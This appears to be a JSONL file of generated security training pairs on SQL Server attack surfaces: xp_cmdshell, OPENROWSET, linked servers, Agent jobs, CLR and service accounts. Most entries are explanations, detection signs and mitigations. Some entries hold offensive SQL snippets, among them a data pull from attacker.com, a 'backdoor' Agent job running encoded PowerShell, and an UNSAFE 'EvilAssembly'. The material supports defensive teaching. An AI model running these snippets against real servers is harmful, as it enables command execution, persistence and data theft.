+{"id": "trtp-49b6cd2d2d1e", "instruction": "What does SQL Server xp_cmdshell look like in SQL?", "output": "Example of SQL Server xp_cmdshell:\n\n```sql\n-- Enable xp_cmdshell:\nEXEC sp_configure 'show advanced options', 1;\nRECONFIGURE;\nEXEC sp_configure 'xp_cmdshell', 1;\nRECONFIGURE;\n\n-- Execute command:\nEXEC xp_cmdshell 'whoami';\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-xp_cmdshell", "license": "original", "retrieved_at": "2025-12-17T19:35:42.131123Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.131233Z", "updated_at": "2025-12-17T19:35:42.131233Z"}
+{"id": "trtp-3a9907fc4a89", "instruction": "How does SQL Server OPENROWSET and OPENDATASOURCE work and what are its security implications?", "output": "OPENROWSET and OPENDATASOURCE enable ad-hoc remote data access in SQL Server. Attackers abuse these to exfiltrate data, connect to external servers, or access local files including password hashes.\n\nSecurity Relevance: These functions enable data exfiltration and file access without xp_cmdshell. OPENROWSET with BULK can read local files. Remote connections can be used to relay attacks or capture credentials.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-openrowset-and-opendatasource", "license": "original", "retrieved_at": "2025-12-17T19:35:42.132922Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.132952Z", "updated_at": "2025-12-17T19:35:42.132952Z"}
+{"id": "trtp-c802c510fe52", "instruction": "What are the main parts of SQL Server OPENROWSET and OPENDATASOURCE that security teams should understand?", "output": "SQL Server OPENROWSET and OPENDATASOURCE consists of the following key components:\n\n- OPENROWSET function\n- OPENDATASOURCE function\n- Ad Hoc Distributed Queries option\n- BULK option for file access\n- Remote server connections", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-openrowset-and-opendatasource", "license": "original", "retrieved_at": "2025-12-17T19:35:42.132922Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.132971Z", "updated_at": "2025-12-17T19:35:42.132971Z"}
+{"id": "trtp-2f4f3b266abc", "instruction": "Why is SQL Server OPENROWSET and OPENDATASOURCE important for database security?", "output": "These functions enable data exfiltration and file access without xp_cmdshell. OPENROWSET with BULK can read local files. Remote connections can be used to relay attacks or capture credentials.\n\nCommon attack vectors include:\n- File reading via BULK option\n- Credential capture through UNC paths\n- Data exfiltration to external servers\n- Lateral movement via linked servers", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-openrowset-and-opendatasource", "license": "original", "retrieved_at": "2025-12-17T19:35:42.132922Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.132985Z", "updated_at": "2025-12-17T19:35:42.132985Z"}
+{"id": "trtp-fa83e69ee135", "instruction": "How do attackers abuse SQL Server OPENROWSET and OPENDATASOURCE?", "output": "Attack techniques involving SQL Server OPENROWSET and OPENDATASOURCE:\n\n- File reading via BULK option\n- Credential capture through UNC paths\n- Data exfiltration to external servers\n- Lateral movement via linked servers\n\nDefenders can detect these attacks by:\n- OPENROWSET/OPENDATASOURCE usage\n- Ad Hoc Distributed Queries enablement\n- Connections to unexpected external sources", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-openrowset-and-opendatasource", "license": "original", "retrieved_at": "2025-12-17T19:35:42.132922Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.132999Z", "updated_at": "2025-12-17T19:35:42.132999Z"}
+{"id": "trtp-0a304203c9e6", "instruction": "How can security teams detect attacks related to SQL Server OPENROWSET and OPENDATASOURCE?", "output": "Methods for detecting SQL Server OPENROWSET and OPENDATASOURCE attacks or anomalies:\n\n- OPENROWSET/OPENDATASOURCE usage\n- Ad Hoc Distributed Queries enablement\n- Connections to unexpected external sources\n- BULK file access", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-openrowset-and-opendatasource", "license": "original", "retrieved_at": "2025-12-17T19:35:42.132922Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.133010Z", "updated_at": "2025-12-17T19:35:42.133010Z"}
+{"id": "trtp-d93943bbb489", "instruction": "What security controls mitigate SQL Server OPENROWSET and OPENDATASOURCE risks?", "output": "Security controls and preventive measures for SQL Server OPENROWSET and OPENDATASOURCE:\n\n- Disable Ad Hoc Distributed Queries\n- Block outbound SQL Server connections\n- Monitor for these functions in queries\n- Restrict required permissions\n\nThese functions enable data exfiltration and file access without xp_cmdshell. OPENROWSET with BULK can read local files. Remote connections can be used to relay attacks or capture credentials.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-openrowset-and-opendatasource", "license": "original", "retrieved_at": "2025-12-17T19:35:42.132922Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.133022Z", "updated_at": "2025-12-17T19:35:42.133022Z"}
+{"id": "trtp-d026152b1038", "instruction": "Provide a code example for SQL Server OPENROWSET and OPENDATASOURCE.", "output": "Example of SQL Server OPENROWSET and OPENDATASOURCE:\n\n```sql\n-- Read local file:\nSELECT * FROM OPENROWSET(BULK 'C:\\\\boot.ini', SINGLE_CLOB) AS x;\n\n-- Connect to external server:\nSELECT * FROM OPENDATASOURCE('SQLOLEDB','Data Source=attacker.com;User ID=sa;Password=pass').master.dbo.sysdatabases;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-openrowset-and-opendatasource", "license": "original", "retrieved_at": "2025-12-17T19:35:42.132922Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.133032Z", "updated_at": "2025-12-17T19:35:42.133032Z"}
+{"id": "trtp-c6178d374661", "instruction": "Explain SQL Server Linked Servers from a security perspective.", "output": "Linked servers enable SQL Server to execute commands against remote data sources including other SQL Servers. Attackers abuse linked servers for lateral movement, privilege escalation, and data access across servers.\n\nSecurity Relevance: Linked servers extend attack surface across multiple databases. Compromising one server may provide access to all linked servers. Credential storage for linked servers is a high-value target.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-linked-servers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.134754Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.134783Z", "updated_at": "2025-12-17T19:35:42.134783Z"}
+{"id": "trtp-c68e34f959cc", "instruction": "Describe the technical aspects of SQL Server Linked Servers.", "output": "SQL Server Linked Servers consists of the following key components:\n\n- sp_addlinkedserver\n- EXECUTE AT linked server\n- Linked server credentials\n- RPC and RPC Out settings\n- Provider configurations", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-linked-servers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.134754Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.134803Z", "updated_at": "2025-12-17T19:35:42.134803Z"}
+{"id": "trtp-5e9db8c5f207", "instruction": "What security risks are associated with SQL Server Linked Servers?", "output": "Linked servers extend attack surface across multiple databases. Compromising one server may provide access to all linked servers. Credential storage for linked servers is a high-value target.\n\nCommon attack vectors include:\n- Enumerate linked servers\n- Execute commands across linked servers\n- Privilege escalation via trusted links\n- Credential harvesting from linked server config", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-linked-servers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.134754Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.134818Z", "updated_at": "2025-12-17T19:35:42.134818Z"}
+{"id": "trtp-1f9ee7f84830", "instruction": "What threats are associated with SQL Server Linked Servers?", "output": "Attack techniques involving SQL Server Linked Servers:\n\n- Enumerate linked servers\n- Execute commands across linked servers\n- Privilege escalation via trusted links\n- Credential harvesting from linked server config\n\nDefenders can detect these attacks by:\n- Linked server enumeration queries\n- Cross-server command execution\n- Linked server configuration changes", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-linked-servers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.134754Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.134833Z", "updated_at": "2025-12-17T19:35:42.134833Z"}
+{"id": "trtp-c0a2aa2e5a8b", "instruction": "How do you detect exploitation of SQL Server Linked Servers?", "output": "Methods for detecting SQL Server Linked Servers attacks or anomalies:\n\n- Linked server enumeration queries\n- Cross-server command execution\n- Linked server configuration changes\n- Unusual activity on linked servers", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-linked-servers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.134754Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.134844Z", "updated_at": "2025-12-17T19:35:42.134844Z"}
+{"id": "trtp-32a87b17c28b", "instruction": "What security controls mitigate SQL Server Linked Servers risks?", "output": "Security controls and preventive measures for SQL Server Linked Servers:\n\n- Minimize linked server usage\n- Use minimal privileges for linked connections\n- Audit linked server access\n- Disable RPC Out where not needed\n\nLinked servers extend attack surface across multiple databases. Compromising one server may provide access to all linked servers. Credential storage for linked servers is a high-value target.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-linked-servers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.134754Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.134856Z", "updated_at": "2025-12-17T19:35:42.134856Z"}
+{"id": "trtp-2ef09ebd2290", "instruction": "Provide a code example for SQL Server Linked Servers.", "output": "Example of SQL Server Linked Servers:\n\n```sql\n-- List linked servers:\nEXEC sp_linkedservers;\n\n-- Execute on linked server:\nEXEC ('SELECT * FROM master.sys.server_principals') AT [LinkedServerName];\n\n-- Enable xp_cmdshell on linked server:\nEXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [LinkedServerName];\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-linked-servers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.134754Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.134867Z", "updated_at": "2025-12-17T19:35:42.134867Z"}
+{"id": "trtp-9e1ec31179ae", "instruction": "How does SQL Server Agent Jobs work and what are its security implications?", "output": "SQL Server Agent executes scheduled tasks and jobs. Attackers can create malicious jobs for persistence, lateral movement, or privilege escalation by exploiting Agent's ability to run commands under its service account.\n\nSecurity Relevance: Agent jobs run with elevated privileges by default. Malicious jobs provide persistence that survives database restarts. CmdExec and PowerShell steps enable arbitrary code execution.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-agent-jobs", "license": "original", "retrieved_at": "2025-12-17T19:35:42.136714Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.136744Z", "updated_at": "2025-12-17T19:35:42.136744Z"}
+{"id": "trtp-8cdc322219c2", "instruction": "What are the key components of SQL Server Agent Jobs?", "output": "SQL Server Agent Jobs consists of the following key components:\n\n- SQL Server Agent service\n- Job creation and scheduling\n- Job step types (T-SQL, CmdExec, PowerShell)\n- msdb database jobs tables\n- Proxy accounts", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-agent-jobs", "license": "original", "retrieved_at": "2025-12-17T19:35:42.136714Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.136764Z", "updated_at": "2025-12-17T19:35:42.136764Z"}
+{"id": "trtp-3781da937757", "instruction": "How can SQL Server Agent Jobs lead to database security incidents?", "output": "Agent jobs run with elevated privileges by default. Malicious jobs provide persistence that survives database restarts. CmdExec and PowerShell steps enable arbitrary code execution.\n\nCommon attack vectors include:\n- Create backdoor jobs for persistence\n- Execute arbitrary commands via CmdExec\n- PowerShell job steps for advanced attacks\n- Privilege escalation via Agent service account", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-agent-jobs", "license": "original", "retrieved_at": "2025-12-17T19:35:42.136714Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.136779Z", "updated_at": "2025-12-17T19:35:42.136779Z"}
+{"id": "trtp-b9c0f715bea0", "instruction": "How do attackers abuse SQL Server Agent Jobs?", "output": "Attack techniques involving SQL Server Agent Jobs:\n\n- Create backdoor jobs for persistence\n- Execute arbitrary commands via CmdExec\n- PowerShell job steps for advanced attacks\n- Privilege escalation via Agent service account\n\nDefenders can detect these attacks by:\n- New job creation in msdb\n- CmdExec or PowerShell job steps\n- Jobs created by non-DBA accounts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-agent-jobs", "license": "original", "retrieved_at": "2025-12-17T19:35:42.136714Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.136793Z", "updated_at": "2025-12-17T19:35:42.136793Z"}
+{"id": "trtp-d4a4497250ff", "instruction": "What indicators reveal malicious activity involving SQL Server Agent Jobs?", "output": "Methods for detecting SQL Server Agent Jobs attacks or anomalies:\n\n- New job creation in msdb\n- CmdExec or PowerShell job steps\n- Jobs created by non-DBA accounts\n- Suspicious job execution patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-agent-jobs", "license": "original", "retrieved_at": "2025-12-17T19:35:42.136714Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.136804Z", "updated_at": "2025-12-17T19:35:42.136804Z"}
+{"id": "trtp-b44ca38fc4ad", "instruction": "What are best practices for preventing SQL Server Agent Jobs?", "output": "Security controls and preventive measures for SQL Server Agent Jobs:\n\n- Restrict SQLAgentOperatorRole membership\n- Monitor msdb.dbo.sysjobs changes\n- Limit Agent service account privileges\n- Audit job creation and modification\n\nAgent jobs run with elevated privileges by default. Malicious jobs provide persistence that survives database restarts. CmdExec and PowerShell steps enable arbitrary code execution.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-agent-jobs", "license": "original", "retrieved_at": "2025-12-17T19:35:42.136714Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.136816Z", "updated_at": "2025-12-17T19:35:42.136816Z"}
+{"id": "trtp-d7b32cafb73e", "instruction": "Show an example of SQL Server Agent Jobs.", "output": "Example of SQL Server Agent Jobs:\n\n```sql\n-- Create malicious job:\nUSE msdb;\nEXEC sp_add_job @job_name = 'backdoor';\nEXEC sp_add_jobstep @job_name = 'backdoor', @step_name = 'exec', @subsystem = 'CmdExec', @command = 'powershell -e <base64>';\nEXEC sp_add_jobserver @job_name = 'backdoor';\nEXEC sp_start_job @job_name = 'backdoor';\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-agent-jobs", "license": "original", "retrieved_at": "2025-12-17T19:35:42.136714Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.136826Z", "updated_at": "2025-12-17T19:35:42.136826Z"}
+{"id": "trtp-70ad1daa8be3", "instruction": "Describe SQL Server CLR Integration and its role in database security.", "output": "SQL Server CLR integration allows running .NET code within the database. Attackers can create malicious CLR assemblies for code execution, bypassing xp_cmdshell restrictions, or accessing protected resources.\n\nSecurity Relevance: CLR assemblies with UNSAFE permission can execute arbitrary code with SQL Server's privileges. Even EXTERNAL_ACCESS enables network and file operations. CLR provides powerful attack capabilities.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-clr-integration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.138565Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.138595Z", "updated_at": "2025-12-17T19:35:42.138595Z"}
+{"id": "trtp-94176f9e6cbc", "instruction": "What are the main parts of SQL Server CLR Integration that security teams should understand?", "output": "SQL Server CLR Integration consists of the following key components:\n\n- CLR enabled option\n- Assembly creation\n- SAFE/EXTERNAL_ACCESS/UNSAFE permission sets\n- Trustworthy database setting\n- CLR stored procedures", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-clr-integration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.138565Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.138615Z", "updated_at": "2025-12-17T19:35:42.138615Z"}
+{"id": "trtp-c08c6f6c6c8e", "instruction": "How can SQL Server CLR Integration lead to database security incidents?", "output": "CLR assemblies with UNSAFE permission can execute arbitrary code with SQL Server's privileges. Even EXTERNAL_ACCESS enables network and file operations. CLR provides powerful attack capabilities.\n\nCommon attack vectors include:\n- Create UNSAFE assembly for code execution\n- Bypass xp_cmdshell via CLR\n- File and network access through CLR\n- In-memory malware execution", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-clr-integration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.138565Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.138630Z", "updated_at": "2025-12-17T19:35:42.138630Z"}
+{"id": "trtp-bdf60434a79a", "instruction": "How can adversaries exploit SQL Server CLR Integration?", "output": "Attack techniques involving SQL Server CLR Integration:\n\n- Create UNSAFE assembly for code execution\n- Bypass xp_cmdshell via CLR\n- File and network access through CLR\n- In-memory malware execution\n\nDefenders can detect these attacks by:\n- CLR enabled configuration changes\n- Assembly creation events\n- UNSAFE or EXTERNAL_ACCESS permissions", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-clr-integration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.138565Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.138644Z", "updated_at": "2025-12-17T19:35:42.138644Z"}
+{"id": "trtp-71b69975a64b", "instruction": "What log entries indicate SQL Server CLR Integration attacks?", "output": "Methods for detecting SQL Server CLR Integration attacks or anomalies:\n\n- CLR enabled configuration changes\n- Assembly creation events\n- UNSAFE or EXTERNAL_ACCESS permissions\n- CLR procedure execution", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-clr-integration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.138565Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.138656Z", "updated_at": "2025-12-17T19:35:42.138656Z"}
+{"id": "trtp-2b986bb03c6f", "instruction": "What preventive measures address SQL Server CLR Integration vulnerabilities?", "output": "Security controls and preventive measures for SQL Server CLR Integration:\n\n- Disable CLR if not needed\n- Restrict assembly creation privileges\n- Monitor for UNSAFE assemblies\n- Avoid TRUSTWORTHY database setting\n\nCLR assemblies with UNSAFE permission can execute arbitrary code with SQL Server's privileges. Even EXTERNAL_ACCESS enables network and file operations. CLR provides powerful attack capabilities.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-clr-integration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.138565Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.138668Z", "updated_at": "2025-12-17T19:35:42.138668Z"}
+{"id": "trtp-9fe3f737f8a5", "instruction": "What is the syntax for SQL Server CLR Integration?", "output": "Example of SQL Server CLR Integration:\n\n```sql\n-- Enable CLR:\nEXEC sp_configure 'clr enabled', 1;\nRECONFIGURE;\n\n-- Create malicious assembly:\nCREATE ASSEMBLY EvilAssembly FROM 0x4D5A... WITH PERMISSION_SET = UNSAFE;\n\n-- Create procedure:\nCREATE PROCEDURE dbo.ExecCmd @cmd NVARCHAR(4000) AS EXTERNAL NAME EvilAssembly.StoredProcedures.ExecCmd;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-clr-integration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.138565Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.138678Z", "updated_at": "2025-12-17T19:35:42.138678Z"}
+{"id": "trtp-36aac0e8a4d1", "instruction": "What do security professionals need to know about SQL Server Service Accounts?", "output": "SQL Server services run under service accounts whose privileges determine the potential impact of compromise. Overprivileged service accounts enable lateral movement and domain escalation from SQL Server compromise.\n\nSecurity Relevance: SQL Server service accounts often have excessive privileges. Domain admin service accounts enable immediate domain compromise. Even regular domain accounts may enable Kerberos attacks and lateral movement.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-service-accounts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.140689Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.140719Z", "updated_at": "2025-12-17T19:35:42.140719Z"}
+{"id": "trtp-9622dfe414af", "instruction": "Describe the technical aspects of SQL Server Service Accounts.", "output": "SQL Server Service Accounts consists of the following key components:\n\n- SQL Server service account\n- SQL Agent service account\n- Domain vs local accounts\n- Managed Service Accounts (MSA)\n- Kerberos delegation", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-service-accounts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.140689Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.140738Z", "updated_at": "2025-12-17T19:35:42.140738Z"}
+{"id": "trtp-da9172bdb02e", "instruction": "Why is SQL Server Service Accounts important for database security?", "output": "SQL Server service accounts often have excessive privileges. Domain admin service accounts enable immediate domain compromise. Even regular domain accounts may enable Kerberos attacks and lateral movement.\n\nCommon attack vectors include:\n- Extract service account credentials\n- Kerberoasting service account SPNs\n- Lateral movement using service account\n- Domain escalation from DA service accounts", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-service-accounts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.140689Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.140753Z", "updated_at": "2025-12-17T19:35:42.140753Z"}
+{"id": "trtp-6dd63cefbfbb", "instruction": "How can adversaries exploit SQL Server Service Accounts?", "output": "Attack techniques involving SQL Server Service Accounts:\n\n- Extract service account credentials\n- Kerberoasting service account SPNs\n- Lateral movement using service account\n- Domain escalation from DA service accounts\n\nDefenders can detect these attacks by:\n- Unusual authentication by service account\n- Service account access to non-database resources\n- Credential material in memory dumps", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-service-accounts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.140689Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.140767Z", "updated_at": "2025-12-17T19:35:42.140767Z"}
+{"id": "trtp-d0633cee1633", "instruction": "What indicators reveal malicious activity involving SQL Server Service Accounts?", "output": "Methods for detecting SQL Server Service Accounts attacks or anomalies:\n\n- Unusual authentication by service account\n- Service account access to non-database resources\n- Credential material in memory dumps\n- Kerberos TGS requests for SQL SPNs", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-service-accounts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.140689Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.140780Z", "updated_at": "2025-12-17T19:35:42.140780Z"}
+{"id": "trtp-0a93ba3140d0", "instruction": "How do you defend against SQL Server Service Accounts attacks?", "output": "Security controls and preventive measures for SQL Server Service Accounts:\n\n- Use Managed Service Accounts\n- Apply least privilege to service accounts\n- Avoid domain admin service accounts\n- Constrain Kerberos delegation\n\nSQL Server service accounts often have excessive privileges. Domain admin service accounts enable immediate domain compromise. Even regular domain accounts may enable Kerberos attacks and lateral movement.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-service-accounts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.140689Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.140791Z", "updated_at": "2025-12-17T19:35:42.140791Z"}
+{"id": "trtp-4eb200d315cf", "instruction": "Provide a code example for SQL Server Service Accounts.", "output": "Example of SQL Server Service Accounts:\n\n```sql\n-- Check service account:\nSELECT servicename, service_account FROM sys.dm_server_services;\n\n-- Check impersonation capabilities:\nSELECT name FROM sys.server_principals WHERE is_disabled = 0;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-service-accounts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.140689Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.140809Z", "updated_at": "2025-12-17T19:35:42.140809Z"}
